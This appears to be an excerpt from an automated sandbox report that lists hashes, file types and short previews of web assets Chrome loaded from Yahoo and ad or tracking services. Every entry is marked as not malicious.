                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D0FFC287EF4372D10EE4D669BF0635B60DCEBCEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:44D66361DA159482AB3FE9F2869457E289CAC2035455D216352D48B4BB7B41FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:134C85F595BF845BD2C414CB3B6AB4F12F2F7092D6FCA111D895A56FE0383AACBEE06B097D63B05B1F5AACA9BFE52BB639E924465176A2FCE6FF7C34C1D0D0DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ .........(.,acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt...P...#wtpt...t....rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin... ...>mmod...`...(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN........thTH........caES........enAU.......vesXL........deDE........enUS........ptBR........plPL......."elGR..."...4svSE.......VtrTR.......fptPT.......zjaJP.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.730841676486811
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:qqNHnQLiDuAJKyMhWqGYHYOfaK+Cw:qqRQLiDRKsvYH9aKLw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EBBF7585C063823A02D97415F292F30B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D2BD5E4B0CD41F20E1CBE337601D12439F7C9911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F6FF295E198F9014F50E977E199014089616A8C48F16F0E73532D60B5524C1C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FB0DB4BF4549D73F483EC92B77C7D49FEC2EE5C1E1FEDBF311FED145FB3164D493E604442AFD2AA69D35597F901D252A6F1BDC912CBE9B363869B8F60EE97AE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var r=(o=>(o.footer="yfinance:editorialFooterTopics",o.stockStoryTopPics="yfinance:stockStoryTopTickers",o))(r||{});export{r as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YHAXW2Vn:YglVn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://rp.liadm.com/j?dtstmp=1727716872500&did=did-004f&se=e30&duid=05c3ae107b3d--01j91z6kskcb9e9axvbr8ebtqq&tv=8.51.0&pu=https%3A%2F%2Fwww.yahoo.com%2F&us_privacy=1YNN&wpn=prebid&gdpr=0&refr=https%3A%2F%2Fhfj.rontishet.ru%2F&gpp_s=DBAA&gpp_as=-1&cd=.yahoo.com&n3pc=true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"bakers":[]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.408254580031926
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:DQQrVWQ51n:DQQrVr51n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2EE4060FAEACB6F83ED07FF055FC10F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7076881D10C3C35B919EBF233ECE73820E315FE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5541CC5B3298A12D33A363A612ED1A537296D9D74B31E6D8A24A06C3BA67A139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A42ADF4EA95FA22DE2B00BCCD5F2C4341EC0B861CDE4151546DA2D06BBC58527D8AB6A6A0F9312496E9883E11C3E2E1781DED5F6730751016149BC7A0181E10D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Typography.CaSb88v6.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.caps.yf-1pqu7qd{text-transform:uppercase}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2299)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.033727722853696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:FhlTvaG69RZraT/58wqwDF4dgXrDVMLvn:hs8TmwxDFsIJMbn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BFB0934E84F7817930BC43C6089DBF48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9C848BA30FEA83D1C1D7996AE77A0C39A59AAAD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:32881FA8C03BA1820C7D8FFA7AE872CB8CD494525D1F3A3E30EF764E2A2AE288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C34A0FDCF70765710421DB27DE5B8A2F708DC414AF0129543158F9FA6F7D19E78D0CD0FA8378E82CB6B2BD580A72BE2AB37A4F8AA67392B1B6C970E2BB96BE88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Debug.SsTdzNxF.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:table.yf-1t0ch3l{max-width:100%;border-collapse:collapse;overflow:auto}table.yf-1t0ch3l th{text-align:left}table.yf-1t0ch3l td,table.yf-1t0ch3l th{word-wrap:break-word;padding:var(--space-2)}table.yf-1t0ch3l tr td:first-child{font-weight:var(--font-medium)}table.yf-1t0ch3l tr:nth-child(2n) td{background-color:var(--surface3)}.flex.yf-1sg9oy1.yf-1sg9oy1{display:flex;justify-content:left;margin-bottom:0;padding:var(--space-2);gap:.8rem}.summaryFlex.yf-1sg9oy1.yf-1sg9oy1{display:flex;align-items:center;gap:var(--space-3);position:relative;width:100%}summary.yf-1sg9oy1.yf-1sg9oy1{cursor:pointer}.summaryText.yf-1sg9oy1.yf-1sg9oy1{font-family:var(--font-family);font-weight:var(--font-medium);font-size:var(--font-s)}.perfItem.yf-1sg9oy1 .perfItem{background-color:var(--surface3)}.perfItem.yf-1sg9oy1.yf-1sg9oy1:hover{background-color:var(--table-hover-emph)}.left.yf-1sg9oy1.yf-1sg9oy1{width:25%;word-break:break-all;display:flex;font-weight:var(--font-medium);justify-content:space-between}.righ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 536x284, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11366
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.983567842692309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:gCMT2Qr6O4ynWPuunCIc1nfpnqj++5am6BHBowfNjppQTG5dE4pZA/yP:bgDLnWIj1lqyRiwfNVr5dE4pZsyP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9F5CC58AAFA8FD1765618CC8026416FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:59DA9FAD3D8778BC7BD6282ED597DBB4D676C950
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:14DE37FD490E7BCCD8BEDA9D63A381A9FEDD761F6795711E47A59AAF65405945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8B44CA4FA87ADABC1E94D99FCAF3E802B0CD7FFF30E4D8C43A4F97CE587C37B14F175A7482AF2E84939312D2D789B366F0212355561A319F8A7827DA7489F878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/wf4JZe1gzftkEKJyi73iwA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_spruce_188/01d9030260c40e4271776a19d81dcb0d.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF^,..WEBPVP8 R,.......*....>y:.I$."*.r..P..en....M...x...W.>.'a.jo.~z.......s..O...|.z...........YO..h..!.....P..w..wb.?...I.?.....b.z......8'@H !....MU..%4.W..OX.i._K].`.N...).....>.6...P....5..s...3.K....?. %...En...F....e......c..?........K........Ug@..IV..%.P.....H....-... x...Oa."!.....&U./....'.../.eo..O.g.bw._{..r)......I......!U..xV.\?.Q.....$..SCm[..no>.Z|..<C....w-.]m..`..V......h.`!....0;G.|J....e..;.#V,H.M.Z.MB.....f......7x.. ..f....;....BQ'.....C...=._....7f.+.aK.Q......I}...8...K4.x...f..8w(=.~_..7..]*.e.......ph._..l...E.( ~.V...I..-../..@qYo..w=.W..h..(...<.5.|z...d2.^......./..a^...j....[5b^At..|....d...>..q..g.....o......w....x....[%N.=N.........Au....)..ea..$...$..T7.....S}.^R......IR..-\.7....1....;..x+.........g.Y.6..}.....v...=.o....U..|..!...P|-n.u|Y.U}..;q#.........KglQ.C..n.....5.D)..5..6..E...M}p....J..G.V...1...M.E.-:{.....q.<`_e...5M1..a7.........E.b.C.7t....R..j...P..R...N...g..R&...Hy..m.......h...R6.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):22971
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.375987138394773
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:9zAth5+sscw10NveS/z03KFp26kowxyKOG9qJHPYerh+m2ZabxJ0:94ZwONvb/zoKFo6kowxyKOO+HPYerh+D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:93423A7A3636346CEA38F6BBC2CC3906
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C0A0804BDB49DF109FE3A41E3C05CDCB3AEDAC8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:80FE8A0B2F97A31016E7927A7A83B6AEA69E263B58F1596C1DA2198EC87284B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:638C7988DF0A1B2CD8BA2E30A5DD366EAE09DF1FC728E824FE6DA51BEBC6DE21F3E29E1A13FD4587962E82066A3ECA2BF6F67AC28EA3BAAA4D163F599421BE1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://www.yahoo.com/service-worker.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* version: 1.1.53 */.!function(){"use strict";function e(e,t,n,r,i,a,o){try{var c=e[a](o),s=c.value}catch(e){return void n(e)}c.done?t(s):Promise.resolve(s).then(r,i)}function t(t){return function(){var n=this,r=arguments;return new Promise((function(i,a){var o=t.apply(n,r);function c(t){e(o,i,a,c,s,"next",t)}function s(t){e(o,i,a,c,s,"throw",t)}c(void 0)}))}}function n(e,t,n){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function r(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7126)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7127
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4824382191057275
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:gFNMYRsKEqNtZrN3GC53b8nI0ui1/qAqQlPQzo7gBYS3YhG:gFzRs36Wk3b8nI0uiYEf7EIU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:68DEF732914CEDD59F5CDF6383D15CC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D447694E2E527E72D12B4E1FF03537817A8ACBB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:289808B92709D4EFE7151F2AE6DE41EA3EDC17E63123A71ACAAFCA35E2ECDA37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E50A52B795E2CA706816CCCE9D8E1186914CFBC0FF5EFC7607B3D20F754C9152DB3B1CC6F5459C6427BAC46EA82EE7C37F604A52DD5EA21C2CA4FBB2CC981337
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Autocomplete.iYQr5gM6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as re,e as z,b as x,d as E,f as K,j as p,i as V,q as o,O as T,L as R,k as te,l as M,a4 as $,G as fe,I as he,Q as de}from"./scheduler.Dsuh-FKt.js";import{S as me,i as be,c as Ce,b as _e,m as we,t as ge,a as Se,d as ye}from"./index.CvwOawEI.js";import{t as D,g as G}from"./commonUtil.BWwawKjd.js";import{I as qe}from"./Icon.C8w5V9EK.js";import{g as Ae}from"./43.BgWy8GOF.js";import ke from"./search.D1DBxgNd.js";function ee(a){let n;return{c(){n=z("div"),this.h()},l(t){n=E(t,"DIV",{class:!0}),K(n).forEach(V),this.h()},h(){o(n,"class","finsrch-rslt finsrch-custom-rst finsrch-show-recomlst yf-cs8l6v"),R(n,"finsrch-show-ftr",a[11])},m(t,r){te(t,n,r)},p(t,r){r[0]&2048&&R(n,"finsrch-show-ftr",t[11])},d(t){t&&V(n)}}}function Te(a){let n,t,r,y,i,d,q,w,C,m,c,g,A;r=new qe({props:{size:a[9],icon:ke,type:a[10],className:"tw-absolute !tw-inline-flex tw-top-3 tw-left-3"}});let u=typeof a[12]!="function"&&ee(a);return{c(){n=z("div"),t=z("form"),Ce(r.$$.fragment),y=x(),i=z("input"),q=x(),u&&u.c(),
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.774650005361297
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:5GWexQlsGTxmV4N7fjvtWNDGWeclss4yV4r13WNB:r03VIiwYVUQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:82DD83A98D216BA3F8537D67723FF769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CA0414AF1F7E4B66903862FCB4136624A1CC75CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8C89F1B9F6E7ABDD0254236F65EFA6F5B49328C12F25151747B8CE4BB49538AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:ED78FD4DA1D14BFC0B090135C7E04AC951AAA640E01B54919AB053F5E434ACF912F6CE215000F26F54E614F2C73C8310BE76D9B4454DFD5CD3A56D4B22DD6B7C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/static/6b/6b91a1bc-8217-4d34-9774-28dc8fd0cd05.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@font-face {. font-family: 'Helvetica Neue';. src: url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Roman.eot');. src: local('Helvetica 55 Roman'), local('HelveticaNeue-Roman'),. url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Roman.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2/HelveticaNeue-Roman.woff2') format('woff2'),. url('//cdn.taboola.com/static/impl/woff/HelveticaNeue-Roman.woff') format('woff'),. url('//cdn.taboola.com/static/impl/ttf/HelveticaNeue-Roman.ttf') format('truetype');. font-weight: normal;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Helvetica Neue';. src: url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Bold.eot');. src: local('Helvetica Neue Bold'), local('HelveticaNeue-Bold'),. url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Bold.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.248147271838624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:Yh0Z9NoV+DgPGsdfGsFDN/VFYrN/W5icpC8xRVVtTljQNGx+q3gQB+Vg4Ybn/Q5s:Yy9NocDgPGWfGeN/VirN/iiwZjn9gg+Y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D5A93703475E2C0BE639363E62B8563A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D23E4866B7D386C5934E0CE201F942E03E52CC3A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1819488198294842AF973D8D3DE0B96858F8D48D0DC4F472689399534A01EF78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AFB17F84D3FA64138F5BB793601E2A18B6BC40FE069B919A860B40D7E4E55D4D62737843A69383DFB148AAE28C7B18AFF3DD434979A8B480B8FB5D39A1E95779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css","name":"react-wafer-shopping.Shopping.atomic"}],"js":[{"location":"bottom","value":"/aaq/wf/wf-core-1.65.1-modern.js","name":"wafer-core","version":"1.65.1"},{"location":"bottom","value":"/aaq/wf/wf-fetch-1.19.1-modern.js","name":"wafer-fetch","version":"1.19.1"}]},"data":{},"html":"<div class=\"wafer-fetch Pos(r)\" id=\"commerce-module-container\" data-wf-body=\"{&quot;config.cpos&quot;:18,&quot;config.enableUserIntent&quot;:false,&quot;config.hiddenCount&quot;:2,&quot;config.listId&quot;:&quot;142c3121-f125-4773-aaf3-3bc2a9c826f1&quot;,&quot;config.openLinksInNewTab&quot;:false,&quot;config.pageContext&quot;:&quot;&quot;,&quot;config.productListId&quot;:&quot;6be44312-a3bc-4c63-891c-d06e455285fc&quot;,&quot;config.renderShoppingProducts&qu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3207)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3887507475952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:o/EK1sFEj8iKmKDBrtwi4+DyrMPb9CV50OSek7NFmyMlUH:aDaIWtwEb9CVi5ekzmTg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6F125F59422E972C7B11E11579052F9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A18B1082B795476F755A014BBC4C8AEC77B94A22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:285C8C7D873D4BA99A2E8A55FC32E9CA85E21840DC8801EEB98C745236D90EA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FFE0694F4C620A82FC551D64FC900632A6B4DE064653826A8F79BD03031A455534A2FC350A852BFC39B349BCC5823338EFC6D573C819359B510C6C2DCED26CD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as C,A as k,e as D,b as E,d as G,f as P,j as W,i as U,B as M,L as u,k as Y,l as v,G as F,_ as N,W as H,c as J,u as K,g as O,a as Q,$ as R}from"./scheduler.Dsuh-FKt.js";import{S as T,i as V,t as m,g as q,a as g,e as L,c as X,b as Z,m as p,d as w}from"./index.CvwOawEI.js";import{g as x}from"./spread.CgU5AtxT.js";import{I as $}from"./Icon.C8w5V9EK.js";import{g as y}from"./i13nUtil.8E8_gCdn.js";function A(n){let e;const a=n[12].default,l=J(a,n,n[11],null);return{c(){l&&l.c()},l(s){l&&l.l(s)},m(s,r){l&&l.m(s,r),e=!0},p(s,r){l&&l.p&&(!e||r&2048)&&K(l,a,s,s[11],e?Q(a,s[11],r,null):O(s[11]),null)},i(s){e||(m(l,s),e=!0)},o(s){g(l,s),e=!1},d(s){l&&l.d(s)}}}function I(n){let e,a;return e=new $({props:{size:n[6]||n[5],icon:n[4],type:"inherit"}}),{c(){X(e.$$.fragment)},l(l){Z(e.$$.fragment,l)},m(l,s){p(e,l,s),a=!0},p(l,s){const r={};s&96&&(r.size=l[6]||l[5]),s&16&&(r.icon=l[4]),e.$set(r)},i(l){a||(m(e.$$.fragment,l),a=!0)},o(l){g(e.$$.fragment,l),a=!1},d(l){w(e,l)}}}function ee(n){let e,a,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUmExltxlNXE:JQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4682377DDFBE4E7DABFDDB2E543E842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:328E472721A93345801ED5533240EAC2D1F8498C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6D8BA81D1B60A18707722A1F2B62DAD48A6ACCED95A1933F49A68B5016620B93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:202612457D9042FE853DAAB3DDCC1F0F960C5FFDBE8462FA435713E4D1D85FF0C3F197DAF8DBA15BDA9F5266D7E1F9ECAEEE045CBC156A4892D2F931FE6FA1BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://www.yahoo.com/px.gif?ch=2&rn=1.7387329119779311
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........2.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
